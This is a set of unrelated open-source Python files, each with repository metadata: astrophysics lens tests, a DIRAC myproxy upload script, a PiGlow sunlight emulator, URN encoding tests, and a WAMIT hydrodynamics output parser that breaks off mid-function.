        d_alpha_dr = self.sersic.d_alpha_dr(x, 0, n_sersic, r_eff, k_eff)
        alpha_dr = self.sersic.alpha_abs(x + dr, 0, n_sersic, r_eff, k_eff)
        alpha = self.sersic.alpha_abs(x, 0, n_sersic, r_eff, k_eff)
        d_alpha_dr_num = (alpha_dr - alpha)/dr
        npt.assert_almost_equal(d_alpha_dr, d_alpha_dr_num, decimal=3)

    def test_mag_sym(self):
        """
        :return:
        """
        # convergence and magnification must be rotationally symmetric:
        # two points at the same radius but different position angles give
        # identical kappa and identical magnification determinant A
        r = 2.
        angle1 = 0.
        angle2 = 1.5
        x1 = r * np.cos(angle1)
        y1 = r * np.sin(angle1)
        x2 = r * np.cos(angle2)
        y2 = r * np.sin(angle2)
        n_sersic = 4.5
        r_eff = 2.5
        k_eff = 0.8
        f_xx1, f_yy1, f_xy1 = self.sersic.hessian(x1, y1, n_sersic, r_eff, k_eff)
        f_xx2, f_yy2, f_xy2 = self.sersic.hessian(x2, y2, n_sersic, r_eff, k_eff)
        kappa_1 = (f_xx1 + f_yy1) / 2
        kappa_2 = (f_xx2 + f_yy2) / 2
        npt.assert_almost_equal(kappa_1, kappa_2, decimal=10)
        A_1 = (1 - f_xx1) * (1 - f_yy1) - f_xy1**2
        A_2 = (1 - f_xx2) * (1 - f_yy2) - f_xy2 ** 2
        npt.assert_almost_equal(A_1, A_2, decimal=10)

    def test_convergernce(self):
        """
        test the convergence and compares it with the original Sersic profile
        :return:
        """
        # the lens convergence kappa, normalized at the first point, should
        # track the (equally normalized) Sersic light profile
        x = np.array([0, 0, 0, 0, 0])
        y = np.array([0.5, 1, 1.5, 2, 2.5])
        n_sersic = 4.5
        r_eff = 2.5
        k_eff = 0.2
        f_xx, f_yy, f_xy = self.sersic.hessian(x, y, n_sersic, r_eff, k_eff)
        kappa = (f_xx + f_yy) / 2.
        assert kappa[0] > 0
        flux = self.sersic_light.function(x, y, I0_sersic=1., R_sersic=r_eff, n_sersic=n_sersic)
        flux /= flux[0]
        kappa /= kappa[0]
        npt.assert_almost_equal(flux[1], kappa[1], decimal=5)
if __name__ == '__main__':
    # Allow running this test module directly with ``python <this file>``.
    pytest.main()
|
sibirrer/astrofunc
|
test/test_sersic_lens.py
|
Python
|
mit
| 6,386
|
[
"Gaussian"
] |
d931365ca5874278dda9b77192dd72afc240745821bcbbc4c887c64f5d865931
|
#!/usr/bin/env python
########################################################################
# $HeadURL$
# File : dirac-proxy-init.py
# Author : Adrian Casajus
########################################################################
from __future__ import print_function
__RCSID__ = "$Id$"
import sys
import DIRAC
from DIRAC.Core.Base import Script
class Params:
    """Holds the command-line option values and the callback methods that
    DIRAC's Script switch parser invokes when a switch is present."""

    # Defaults; overwritten by the switch callbacks below.
    proxyLoc = False
    dnAsUsername = False

    def setProxyLocation(self, arg):
        """Callback for -f/--file: remember the proxy file to upload."""
        self.proxyLoc = arg
        return DIRAC.S_OK()

    def setDNAsUsername(self, arg):
        """Callback for -D/--DN: use the certificate DN as the myproxy
        username (the switch value itself is ignored)."""
        self.dnAsUsername = True
        return DIRAC.S_OK()

    def showVersion(self, arg):
        """Callback for -i/--version: print the version and exit.

        Note: the original implementation had an unreachable
        ``return DIRAC.S_OK()`` after ``sys.exit(0)``; it has been removed.
        """
        print("Version:")
        print(" ", __RCSID__)
        sys.exit(0)
params = Params()

# Register command-line switches; the last argument of each is the callback
# invoked by Script.parseCommandLine() when the switch is given.
Script.registerSwitch("f:", "file=", "File to use as proxy", params.setProxyLocation)
Script.registerSwitch("D", "DN", "Use DN as myproxy username", params.setDNAsUsername)
Script.registerSwitch("i", "version", "Print version", params.showVersion)
Script.addDefaultOptionValue("LogLevel", "always")
Script.parseCommandLine()

# NOTE: these imports are deliberately placed after parseCommandLine() so
# DIRAC is configured before the client modules are loaded.
from DIRAC.FrameworkSystem.Client.ProxyManagerClient import gProxyManager
from DIRAC.Core.Security.MyProxy import MyProxy
from DIRAC.Core.Security.X509Chain import X509Chain  # pylint: disable=import-error
from DIRAC.Core.Security import Locations, CS

# Fall back to the standard proxy location when -f/--file was not given.
if not params.proxyLoc:
    params.proxyLoc = Locations.getProxyLocation()
if not params.proxyLoc:
    print("Can't find any valid proxy")
    sys.exit(1)
print("Uploading proxy file %s" % params.proxyLoc)

# Upload the proxy to the myproxy server; exit non-zero on failure.
mp = MyProxy()
retVal = mp.uploadProxy(params.proxyLoc, params.dnAsUsername)
if not retVal['OK']:
    print("Can't upload proxy:")
    print(" ", retVal['Message'])
    sys.exit(1)
print("Proxy uploaded")
sys.exit(0)
|
petricm/DIRAC
|
FrameworkSystem/scripts/dirac-myproxy-upload.py
|
Python
|
gpl-3.0
| 1,720
|
[
"DIRAC"
] |
08a5cd3d8e75a04f39336ac1d5f51a355b3bde0f7e70dceb4894c75e8ac1e894
|
#!/usr/bin/python
######################################
## Sun Emulator using PiGlow ##
## ##
## Example by @Tommybobbins ##
######################################
# Light curves are based on statistical
# normal distributions. Requires python-scipy.
# Uses the Sunrise/Sunset times from astral
# python package.
#
# sudo apt-get install python-scipy
# sudo pip install astral
# Uses the piglow.py Python module from Jason Barnett @Boeeerb
# sudo mkdir /home/pi/LOGGING
# To run automatically:
# Add the following above the exit 0 in the /etc/rc.local
# /usr/bin/python /home/pi/DayNightGlow/sunny.py &
from astral import *
from piglow import PiGlow
import time
import datetime
import logging
dt = datetime.datetime.now()
# One log file per day, named by today's date.
logging.basicConfig(filename='/home/pi/LOGGING/lightoutput_%i_%i_%i.log' %(dt.year, dt.month, dt.day),level=logging.INFO)

from scipy import stats

number_seconds_day = 60*60*24  # seconds in a day; used to normalise time offsets
centre = 0.0                   # mean of every light curve (0 == exactly at the event)
total_intensity = 0            # running sum of all LED values (for logging)
max_brightness = 255           # PiGlow LEDs accept 0-255
intensity = {}                 # colour name -> current LED value
piglow = PiGlow()
piglow.all(0)                  # start with every LED off

# Solar event times are looked up for Manchester via the astral package.
a = Astral()
location = a["Manchester"]
#print (" %s %s %s %s %s \n" % (dawn, sunrise, noon, sunset, dusk))
#Information for Manchester
# 2014-01-21 07:30:11+00:00 2014-01-21 08:10:06+00:00 2014-01-21 12:20:18+00:00 2014-01-21 16:30:35+00:00 2014-01-21 17:10:31+00:00
# For the local timezone
#print ("Time: %s" % t)
# Tab-separated header for the per-minute log lines written in the main loop.
logging.info("Epoch_Time\tRed\tOrange\tYellow\tGreen\tBlue\tWhite\tTotal")
def calculate_intensity(x, centre, mu, max_brightness):
    """Return a Gaussian light-curve value scaled so its peak equals
    ``max_brightness``.

    x: position on the curve (fraction of a day away from the event)
    centre: mean of the normal distribution
    mu: standard deviation (width of the curve)
    max_brightness: value of the curve at its peak (0-255 for the PiGlow)
    """
    bell = stats.norm(loc=centre, scale=mu)
    # Scale the density so that its maximum (at the centre) maps exactly
    # to max_brightness.
    peak_density = bell.pdf(centre)
    return max_brightness / peak_density * bell.pdf(x)
while True:
    # Recompute today's solar event times on every pass (they drift daily).
    sun = location.sun(local=True)
    dusk = sun['dusk']
    noon = sun['noon']
    midnight = sun['noon']  # NOTE(review): redundant -- overwritten a few lines below
    sunrise = sun['sunrise']
    sunset = sun['sunset']
    dawn = sun['dawn']
    # Solar midnight approximated as 12 h either side of solar noon.
    midnight = sun['noon']+datetime.timedelta(hours=12)
    lastmidnight = sun['noon']-datetime.timedelta(hours=12)
    # print t.day,t.month,t.year
    dt = datetime.datetime.now()
    # Convert all the timings into Epoch times
    epoch_now = time.mktime(dt.timetuple())
    epoch_dawn = time.mktime(dawn.timetuple())
    epoch_sunrise = time.mktime(sunrise.timetuple())
    epoch_midnight = time.mktime(midnight.timetuple())
    epoch_lastmidnight = time.mktime(lastmidnight.timetuple())
    epoch_noon = time.mktime(noon.timetuple())
    epoch_sunset = time.mktime(sunset.timetuple())
    epoch_dusk = time.mktime(dusk.timetuple())
    # Seconds between each event and now (negative once the event has passed).
    dawn_diff = float(epoch_dawn - epoch_now)
    sunrise_diff = float(epoch_sunrise - epoch_now)
    noon_diff = float(epoch_noon - epoch_now)
    sunset_diff = float(epoch_sunset - epoch_now)
    dusk_diff = float(epoch_dusk - epoch_now)
    midnight_diff = float(epoch_midnight - epoch_now)
    lastmidnight_diff = float(epoch_lastmidnight - epoch_now)
    # Express each offset as a fraction of a day -- the x-coordinate fed to
    # the Gaussian light curves.
    norm_dawn_diff = dawn_diff / number_seconds_day
    norm_sunrise_diff = sunrise_diff / number_seconds_day
    norm_noon_diff = noon_diff / number_seconds_day
    norm_sunset_diff = sunset_diff / number_seconds_day
    norm_dusk_diff = dusk_diff / number_seconds_day
    # Use whichever solar midnight (next or previous) is relevant.
    if (epoch_now > epoch_noon):
        norm_midnight_diff = midnight_diff / number_seconds_day
    elif (epoch_now < epoch_noon):
        norm_midnight_diff = lastmidnight_diff / number_seconds_day
    else:
        # NOTE(review): if epoch_now == epoch_noon exactly,
        # norm_midnight_diff is left undefined and the blue-curve line
        # below raises NameError -- confirm and handle this edge case.
        print ("Something wrong")
    # print ("D %f, SR %f, N %f, SS %f, D %f M %f\n" % (dawn_diff, sunrise_diff, noon_diff, sunset_diff, dusk_diff, midnight_diff))
    # print ("D %f, SR %f, N %f, SS %f, D %f , M %f\n" % (norm_dawn_diff, norm_sunrise_diff, norm_noon_diff, norm_sunset_diff, norm_dusk_diff, norm_midnight_diff))
    # Gaussian curve per colour (third argument is the curve width):
    #   dawn/dusk      -> red, narrow
    #   sunrise/sunset -> orange (narrow) + yellow (wider)
    #   noon           -> yellow/green/white, broad
    #   midnight       -> blue, low and wide (plus a small noon component)
    intensity['red'] = calculate_intensity(norm_dawn_diff,centre,0.04,255)
    intensity['red'] += calculate_intensity(norm_dusk_diff,centre,0.04,255)
    intensity['orange'] = calculate_intensity(norm_sunrise_diff,centre,0.02,255)
    intensity['orange'] += calculate_intensity(norm_sunset_diff,centre,0.02,255)
    intensity['yellow'] = calculate_intensity(norm_sunrise_diff,centre,0.05,255)
    intensity['yellow'] += calculate_intensity(norm_sunset_diff,centre,0.05,255)
    intensity['yellow'] += calculate_intensity(norm_noon_diff,centre,0.08,255)
    intensity['green'] = calculate_intensity(norm_noon_diff,centre,0.1,255)
    intensity['blue'] = calculate_intensity(norm_midnight_diff,centre,0.15,255)
    intensity['blue'] += calculate_intensity(norm_noon_diff,centre,0.09,255)
    intensity['white'] = calculate_intensity(norm_noon_diff,centre,0.07,64)
    # Clamp to the PiGlow's 0-255 range and round to integer LED values.
    total_intensity = 0
    for key in intensity:
        if (intensity[key] > 255):
            intensity[key] = 255
        else:
            intensity[key] = int(round(intensity[key]))
        total_intensity += intensity[key]
        # print ("Key = %s, value = %i\n" % (key, intensity[key]))
    # Push the computed values to the LEDs.
    piglow.red(intensity['red'])
    piglow.orange(intensity['orange'])
    piglow.yellow(intensity['yellow'])
    piglow.green(intensity['green'])
    piglow.blue(intensity['blue'])
    piglow.white(intensity['white'])
    # Condensed logging for graphing purposes (time, followed by the colours)
    logging.info("%i %i %i %i %i %i %i %i" %(epoch_now,
        intensity['red'],
        intensity['orange'],
        intensity['yellow'],
        intensity['green'],
        intensity['blue'],
        intensity['white'],
        total_intensity)
        )
    # Update once a minute.
    time.sleep(60)
|
tommybobbins/DayNightGlow
|
sunny.py
|
Python
|
gpl-2.0
| 6,392
|
[
"Gaussian"
] |
24bab4363ad1b03389193027ad5e1201211535d2fed6fffa9f6a5a81b2838e52
|
#
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import, print_function
from unittest import TestCase
from commoncode import urn
class URNTestCase(TestCase):
    """Tests for commoncode.urn encode/decode round-tripping, quoting and
    validation errors.

    Changes from the original: the deprecated ``assertEquals`` alias is
    replaced with ``assertEqual``, and the final test's broken assertion
    (``assert object_type, fields == ...`` asserted only the truthiness of
    ``object_type``, using the comparison as the assert *message*) now
    compares the full decoded tuple.
    """

    def test_encode_license(self):
        u1 = urn.encode('license', key='somekey')
        self.assertEqual('urn:dje:license:somekey', u1)

    def test_encode_owner(self):
        u1 = urn.encode('owner', name='somekey')
        self.assertEqual('urn:dje:owner:somekey', u1)

    def test_encode_component(self):
        u1 = urn.encode('component', name='name', version='version')
        self.assertEqual('urn:dje:component:name:version', u1)

    def test_encode_component_no_version(self):
        u1 = urn.encode('component', name='name', version='')
        self.assertEqual('urn:dje:component:name:', u1)

    def test_encode_license_with_extra_fields_are_ignored(self):
        u1 = urn.encode('license', key='somekey', junk='somejunk')
        self.assertEqual('urn:dje:license:somekey', u1)

    def test_encode_missing_field_raise_keyerror(self):
        with self.assertRaises(KeyError):
            urn.encode('license')

    def test_encode_missing_field_component_raise_keyerror(self):
        with self.assertRaises(KeyError):
            urn.encode('component', name='this')

    def test_encode_unknown_object_type_raise_keyerror(self):
        with self.assertRaises(KeyError):
            urn.encode('some', key='somekey')

    def test_encode_component_with_spaces_are_properly_quoted(self):
        u1 = urn.encode('component', name='name space',
                        version='version space')
        self.assertEqual('urn:dje:component:name+space:version+space', u1)

    def test_encode_leading_and_trailing_spaces_are_trimmed_and_ignored(self):
        u1 = urn.encode(' component ', name=' name space ',
                        version=''' version space ''')
        self.assertEqual('urn:dje:component:name+space:version+space', u1)

    def test_encode_component_with_semicolon_are_properly_quoted(self):
        u1 = urn.encode('component', name='name:', version=':version')
        self.assertEqual('urn:dje:component:name%3A:%3Aversion', u1)

    def test_encode_component_with_plus_are_properly_quoted(self):
        u1 = urn.encode('component', name='name+', version='version+')
        self.assertEqual('urn:dje:component:name%2B:version%2B', u1)

    def test_encode_component_with_percent_are_properly_quoted(self):
        u1 = urn.encode('component', name='name%', version='version%')
        self.assertEqual('urn:dje:component:name%25:version%25', u1)

    def test_encode_object_type_case_is_not_significant(self):
        u1 = urn.encode('license', key='key')
        u2 = urn.encode('lICENSe', key='key')
        self.assertEqual(u1, u2)

    def test_decode_component(self):
        u = 'urn:dje:component:name:version'
        parsed = ('component', {'name': 'name', 'version': 'version'})
        self.assertEqual(parsed, urn.decode(u))

    def test_decode_license(self):
        u = 'urn:dje:license:lic'
        parsed = ('license', {'key': 'lic'})
        self.assertEqual(parsed, urn.decode(u))

    def test_decode_org(self):
        u = 'urn:dje:owner:name'
        parsed = ('owner', {'name': 'name'})
        self.assertEqual(parsed, urn.decode(u))

    def test_decode_build_is_idempotent(self):
        u1 = urn.encode('component', owner__name='org%', name='name%',
                        version='version%')
        m, f = urn.decode(u1)
        u3 = urn.encode(m, **f)
        self.assertEqual(u1, u3)

    def test_decode_raise_exception_if_incorrect_prefix(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('arn:dje:a:a')

    def test_decode_raise_exception_if_incorrect_ns(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('urn:x:x:x')

    def test_decode_raise_exception_if_incorrect_prefix_or_ns(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('x:x:x:x')

    def test_decode_raise_exception_if_too_short_license(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('urn:dje:license')

    def test_decode_raise_exception_if_too_short_component(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('urn:dje:component')

    def test_decode_raise_exception_if_too_long(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('urn:dje:owner:o:n')

    def test_decode_raise_exception_if_too_long1(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('urn:dje:component:o:n:v:junk')

    def test_decode_raise_exception_if_too_long2(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('urn:dje:owner:org:junk')

    def test_decode_raise_exception_if_too_long3(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('urn:dje:license:key:junk')

    def test_decode_raise_exception_if_unknown_object_type(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('urn:dje:marshmallows:dsds')

    def test_decode_raise_exception_if_missing_object_type(self):
        with self.assertRaises(urn.URNValidationError):
            urn.decode('urn:dje::dsds')

    def test_encode_decode_is_idempotent(self):
        object_type = 'component'
        fields = {'name': 'SIP Servlets (MSS)', 'version': 'v 1.4.0.FINAL'}
        encoded = 'urn:dje:component:SIP+Servlets+%28MSS%29:v+1.4.0.FINAL'
        assert encoded == urn.encode(object_type, **fields)
        # Fixed: compare the decoded (type, fields) tuple instead of
        # asserting only `object_type` with the comparison as the message.
        assert (object_type, fields) == urn.decode(encoded)
|
retrography/scancode-toolkit
|
tests/commoncode/test_urn.py
|
Python
|
apache-2.0
| 7,034
|
[
"VisIt"
] |
8d735f3184def59d851ce5c5c1f3db3ed86322486c507fdd22959016b2bed149
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''bemio WAMIT module
This moduel provides functionality to read and interact with WAMIT simulation
output data
'''
import os
import numpy as np
from bemio.data_structures import bem
class WamitOutput(object):
    '''
    Class to read and interact with WAMIT simulation data

    Parameters:
        out_file : str
            Name of the wamit .out output file. In order to read scattering
            and Froude-Krylov forces the .3sc (scattering) and .3fk
            (Froude-Krylov) coefficient files must have the same base name
            as the .out file.
        density : float, optional
            Water density used to scale the hydrodynamic coefficient data
        gravity : float, optional
            Acceleration due to gravity used to scale the hydrodynamic
            coefficient data
        scale : bool, optional
            Boolean value to determine if the hydrodynamic data is scaled.
            See the bemio.data_structures.bem.scale function for more
            information

    Examples
        The user can create a WamitOutput data object directly as shown below,
        or the bemio.io.wamit.read function can be used. The following example
        assumes there is a WAMIT output file named `wamit.out`.

        >>> wamit_data = WamitOutput(out_file=wamit.out)
    '''
    def __init__(self, out_file, density=1000., gravity=9.81, scale=False):
        # Derive the .3sc/.3fk companion file names from the .out base name.
        self.files = bem.generate_file_names(out_file)
        self.files['3sc'] = self.files['base_name'] + '.3sc'
        self.files['3fk'] = self.files['base_name'] + '.3fk'

        self.rho = density   # water density used when scaling coefficients
        self.g = gravity     # gravitational acceleration used when scaling
        self.body = {}       # body index -> bem.HydrodynamicData
        self.scaled_at_read = scale
        self.scaled = False
        # Parse the output files immediately on construction.
        self._read()
    def _read(self):
        '''Parse the WAMIT .out file (plus optional .3sc/.3fk files) and
        populate ``self.body`` with one ``bem.HydrodynamicData`` entry per
        body. Called once from ``__init__``.
        '''
        print '\nReading the WAMIT results in the ' + self.files['out'] + ' file'

        with open(self.files['out'],'rU') as fid:
            raw = fid.readlines()

        code = 'WAMIT'
        num_bodies = 0   # Total number of bodies
        bod_count = 0    # Counter for bodies
        T = []           # wave periods from the POTEN header block
        cg = {}          # body index -> XBODY/YBODY/ZBODY position
        cb = {}          # body index -> center of buoyancy
        name = {}        # body index -> geometry file name
        disp_vol = {}    # body index -> displaced volume
        k = {}           # body index -> 6x6 hydrostatic stiffness matrix
        wave_dir = []    # every "Wave Heading" entry (repeats once per period)
        empty_line = '\n'  # blank lines delimit the tabular sections

        # --- Pass 1: periods, headings, water depth and body geometry ---
        for i, line in enumerate(raw):

            if "POTEN run date and starting time:" in line:
                skip = 2
                data = raw[i+skip]
                count = 0
                # Periods of 0. and -1. are the special zero/infinite
                # frequency runs; they are skipped, not appended to T.
                while data != empty_line:
                    if float(data.split()[0]) == 0. or float(data.split()[0]) == -1.:
                        count += 1
                        data = raw[i+count+skip]
                    else:
                        count += 1
                        T.append(float(data.split()[0]))
                        data = raw[i+count+skip]

            if "Wave Heading (deg)" in line:
                wave_dir.append(float(line.split()[-1]))

            if 'Water depth:' in line:
                water_depth = raw[i].split()[2]
                try:
                    # Numeric depths become floats; "infinite" stays a string.
                    water_depth = np.float(water_depth)
                except:
                    pass

            # If there is one body in the WAMIT run
            if "Input from Geometric Data File:" in line:
                num_bodies = 1
                name[0] = raw[i].split()[-1]

            # If there are two or more bodies in the WAMIT run
            if "Input from Geometric Data Files:" in line:
                for j in xrange(20): # look for bodies within the next 20 lines
                    if "N=" in raw[i+j]:
                        num_bodies += 1
                        name[num_bodies-1] = raw[i+j].split()[-1]

            # Read the body positions and hydrostatic data
            if "XBODY" in line:
                for j in xrange(12): # scan the following lines - will only work for wamit files of about 5 bodies
                    if 'XBODY =' in raw[i+j]:
                        '''
                        Note that this is the XBOD YBOD ZBOD defined in the wamit .out file, not the cg as defined in the wamit file
                        '''
                        temp = raw[i+j].split()
                        cg[bod_count] = np.array([temp[2],temp[5],temp[8]]).astype(float)
                    if 'Volumes (VOLX,VOLY,VOLZ):' in raw[i+j]:
                        temp = raw[i+j].split()
                        disp_vol[bod_count] = float(temp[-1])
                    if 'Center of Buoyancy (Xb,Yb,Zb):' in raw[i+j]:
                        temp = raw[i+j].split()
                        cb[bod_count] = np.array([temp[-3],temp[-2],temp[-1]]).astype(float)
                    if 'C(3,3),C(3,4),C(3,5):' in raw[i+j]:
                        # Symmetric hydrostatic stiffness; WAMIT reports only
                        # the heave/roll/pitch entries.
                        temp = np.zeros([6,6])
                        temp2 = raw[i+j].split()
                        temp[2,2] = np.float(temp2[1])
                        temp[2,3] = np.float(temp2[2])
                        temp[2,4] = np.float(temp2[3])
                        temp[3,2] = temp[2,3]
                        temp[4,2] = temp[2,4]
                        temp2 = raw[i+j+1].split()
                        temp[3,3] = np.float(temp2[1])
                        temp[3,4] = np.float(temp2[2])
                        temp[3,5] = np.float(temp2[3])
                        temp[4,3] = temp[3,4]
                        temp[5,3] = temp[3,5]
                        temp2 = raw[i+j+2].split()
                        temp[4,4] = np.float(temp2[1])
                        temp[4,5] = np.float(temp2[2])
                        temp[5,4] = temp[4,5]
                        k[bod_count] = temp
                        # Stiffness is the last per-body item, so advance the
                        # body counter here.
                        bod_count += 1

        # Put things into numpy arrays
        T = np.array(T).astype(float)
        wave_dir = np.array(wave_dir).astype(float)

        # Only select the wave headings once (the .out file repeats the full
        # heading list for every period).
        temp = 999999
        temp_wave_dir = []
        count = 0
        while temp != wave_dir[0]:
            count += 1
            temp_wave_dir.append(wave_dir[count-1])
            temp = wave_dir[count]
        wave_dir = np.array(temp_wave_dir).astype(float)

        # --- Pass 2: added mass and radiation damping ---
        count_freq = 0
        am_all = np.zeros([6*num_bodies,6*num_bodies,T.size])
        rd_all = am_all.copy()
        am_inf = np.zeros([6*num_bodies,6*num_bodies])
        am_zero = am_inf.copy()

        for i, line in enumerate(raw):

            # Read infinite-frequency (zero period) added mass
            if "Wave period = zero" in line:
                count = 7
                temp_line = raw[count+i]
                while temp_line != empty_line:
                    am_inf[int(temp_line.split()[0])-1,int(temp_line.split()[1])-1] = temp_line.split()[2]
                    count += 1
                    temp_line = raw[count+i]

            # Read zero-frequency (infinite period) added mass
            if "Wave period = infinite" in line:
                count = 7
                temp_line = raw[count+i]
                while temp_line != empty_line:
                    am_zero[int(temp_line.split()[0])-1,int(temp_line.split()[1])-1] = temp_line.split()[2]
                    count += 1
                    temp_line = raw[count+i]

            # Read frequency-dependent added mass and radiation damping
            if "Wave period (sec) =" in line:
                temp = raw[i].split()
                T[count_freq]=temp[4]
                count = 7
                temp_line = raw[count+i]
                while temp_line != empty_line:
                    am_all[int(temp_line.split()[0])-1,int(temp_line.split()[1])-1,count_freq] = temp_line.split()[2]
                    rd_all[int(temp_line.split()[0])-1,int(temp_line.split()[1])-1,count_freq] = temp_line.split()[3]
                    count += 1
                    temp_line = raw[count+i]
                count_freq += 1

        # --- Pass 3: excitation forces and phases, RAOs, Haskind forces and
        # surge/sway/yaw drift forces. Each section has the same layout:
        # a heading marker line, then per-wave-direction tables 4 lines below.
        ex_all = np.zeros([6*num_bodies,wave_dir.size,T.size])
        phase_all = ex_all.copy()
        rao_all = ex_all.copy()
        rao_phase_all = ex_all.copy()
        ssy_all = ex_all.copy()
        ssy_phase_all = ex_all.copy()
        haskind_all = ex_all.copy()
        haskind_phase_all = ex_all.copy()
        count_diff2 = 0
        count_rao2 = 0
        count_ssy2 = 0
        count_haskind2 = 0
        for i, line in enumerate(raw):
            count_diff = 0
            count_rao = 0
            count_ssy = 0
            count_haskind = 0

            if "DIFFRACTION EXCITING FORCES AND MOMENTS" in line:
                count_diff += 1
                count_diff2 += 1
                count_wave_dir = 0
                count = 0
                while count_wave_dir < wave_dir.size:
                    count += 1
                    if "Wave Heading (deg) :" in raw[i+count_diff + count]:
                        count_wave_dir += 1
                        temp_line = raw[i+count_diff+count+4]
                        count2 = 0
                        while temp_line != empty_line:
                            count2 += 1
                            ex_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_diff2-1] = float(temp_line.split()[1])
                            phase_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_diff2-1] = float(temp_line.split()[2])
                            temp_line = raw[i+count_diff+count+4+count2]

            if "RESPONSE AMPLITUDE OPERATORS" in line:
                count_rao += 1
                count_rao2 += 1
                count_wave_dir = 0
                count = 0
                while count_wave_dir < wave_dir.size:
                    count += 1
                    if "Wave Heading (deg) :" in raw[i+count_rao + count]:
                        count_wave_dir += 1
                        temp_line = raw[i+count_rao+count+4]
                        count2 = 0
                        while temp_line != empty_line:
                            count2 += 1
                            rao_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_rao2-1] = float(temp_line.split()[1])
                            rao_phase_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_rao2-1] = float(temp_line.split()[2])
                            temp_line = raw[i+count_rao+count+4+count2]

            if "HASKIND EXCITING FORCES AND MOMENTS" in line:
                count_haskind += 1
                count_haskind2 += 1
                count_wave_dir = 0
                count = 0
                while count_wave_dir < wave_dir.size:
                    count += 1
                    if "Wave Heading (deg) :" in raw[i+count_haskind + count]:
                        count_wave_dir += 1
                        # NOTE(review): the offsets below use count_ssy (always
                        # 0 here) instead of count_haskind, unlike the other
                        # three sections -- looks like a copy/paste slip.
                        # Confirm against a .out file containing Haskind data.
                        temp_line = raw[i+count_ssy+count+4]
                        count2 = 0
                        while temp_line != empty_line:
                            count2 += 1
                            haskind_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_haskind2-1] = float(temp_line.split()[1])
                            haskind_phase_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_haskind2-1] = float(temp_line.split()[2])
                            temp_line = raw[i+count_ssy+count+4+count2]

            if "SURGE, SWAY & YAW DRIFT FORCES (Momentum Conservation)" in line:
                count_ssy += 1
                count_ssy2 += 1
                count_wave_dir = 0
                count = 0
                while count_wave_dir < wave_dir.size:
                    count += 1
                    if "Wave Heading (deg) :" in raw[i+count_ssy + count]:
                        count_wave_dir += 1
                        temp_line = raw[i+count_ssy+count+4]
                        count2 = 0
                        while temp_line != empty_line:
                            count2 += 1
                            ssy_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_ssy2-1] = float(temp_line.split()[1])
                            ssy_phase_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_ssy2-1] = float(temp_line.split()[2])
                            temp_line = raw[i+count_ssy+count+4+count2]

        # --- Optional .3sc (scattering) coefficient file ---
        if os.path.exists(self.files['3sc']):
            sc_re = np.zeros([6*num_bodies,wave_dir.size,T.size])
            sc_im = sc_re.copy()
            sc_phase = sc_re.copy()
            sc_mag = sc_re.copy()
            scattering = np.loadtxt(self.files['3sc'],skiprows=1)
            line_count = 0
            for freq_n in xrange(T.size):
                for beta_n in xrange(wave_dir.size):
                    wave_dir_hold = scattering[line_count][1]
                    while line_count < scattering.shape[0] and scattering[line_count][1] == wave_dir_hold:
                        comp = int(scattering[line_count][2])-1
                        sc_mag[comp,beta_n,freq_n] = scattering[line_count][3]
                        sc_phase[comp,beta_n,freq_n] = scattering[line_count][4]
                        sc_re[comp,beta_n,freq_n] = scattering[line_count][5]
                        sc_im[comp,beta_n,freq_n] = scattering[line_count][6]
                        wave_dir_hold = scattering[line_count][1]
                        line_count += 1
        else:
            print '\tThe file ' + self.files['3sc'] + ' does not exist... not reading scattering coefficients.'

        # --- Optional .3fk (Froude-Krylov) coefficient file ---
        if os.path.exists(self.files['3fk']):
            fk_re = np.zeros([6*num_bodies,wave_dir.size,T.size])
            fk_im = fk_re.copy()
            fk_phase = fk_re.copy()
            fk_mag = fk_re.copy()
            fk = np.loadtxt(self.files['3fk'],skiprows=1)
            line_count = 0
            for freq_n in xrange(T.size):
                for beta_n in xrange(wave_dir.size):
                    wave_dir_hold = fk[line_count][1]
                    while line_count < fk.shape[0] and fk[line_count][1] == wave_dir_hold:
                        comp = int(fk[line_count][2])-1
                        fk_mag[comp,beta_n,freq_n] = fk[line_count][3]
                        fk_phase[comp,beta_n,freq_n] = fk[line_count][4]
                        fk_re[comp,beta_n,freq_n] = fk[line_count][5]
                        fk_im[comp,beta_n,freq_n] = fk[line_count][6]
                        # NOTE(review): this reads from `scattering`, not `fk`
                        # -- probable copy/paste bug; it also raises NameError
